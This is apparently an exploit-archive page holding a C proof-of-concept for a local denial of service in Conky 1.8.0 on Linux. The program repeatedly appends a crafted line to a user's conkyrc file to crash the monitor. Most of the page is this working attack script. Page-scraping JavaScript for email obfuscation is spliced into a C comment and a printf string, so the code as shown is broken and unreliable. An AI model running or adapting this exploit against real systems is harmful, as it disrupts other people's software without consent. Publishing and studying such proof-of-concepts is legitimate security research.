Conky Linux 1.8.0 Local DoS/PoC Exploit



EKU-ID: 528 CVE: OSVDB-ID:
Author: Arturo D'Elia Published: 2011-06-15 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


/*                                                      */
/*  Vulnerability Conky 1.8.0 on Linux                  */
/*   Tested on: Linux with kernel 2.6.32.1-smp          */
/*       Found: by Arturo D'Elia                        */
/*  Date found: 12 Dec 2010                             */
/*         Fix: No Fix                                  */
/*    Contacts: arturo.delia@libero.it<SCRIPT type=text/javascript>
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</SCRIPT>                  */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char killyou[]=  "# w000wwwww i exploit it and i kill you!";

int main( int argc, char **argv){

    FILE *fp;

    /*  Write the information program*/
    printf("\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\n");
    printf("[*]       Coded by: Arturo D'Elia\n");
    printf("[*]      Tested on: Linux\n");
    printf("[*] Kernel version: 2.6.32.1-smp\n");
    printf("[*]      Bug Found: 12 Dec 2010\n");
    printf("[*]       Contacts: arturo.delia@libero.it<SCRIPT type=text/javascript>
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</SCRIPT>\n\n");

    /*  Check the input parameter   */
    if(argc!=2)
        exit(fprintf(stderr,"Usage: %s < path conkyrc >\n",argv[0]));

    /*  Check file exsist           */
    printf("[>] Open conky configuration\n");
    if((fp=fopen(argv[1],"r"))==NULL)
        exit(fprintf(stderr,"[x] Cannot open %s file\n",argv[1]));
    fclose(fp);

    /*  Open file for append and i send it the  */
    /*  exploited strings                       */
    fp=fopen(argv[1],"a");
    printf("[>] Send the DoS/PoC string\n");
    fprintf(fp,"%s\n",killyou);
    fclose(fp);

    /*  Wait 3 seconds              */
    usleep(3000000);

    /*  Resend exploited strings    */
    fp=fopen(argv[1],"a");
    fprintf(fp,"%s\n",killyou);
    fclose(fp);

    /*  Ok guy.                     */
    printf("[*] Ok guy, you kill it.\n\n");
return 0;
}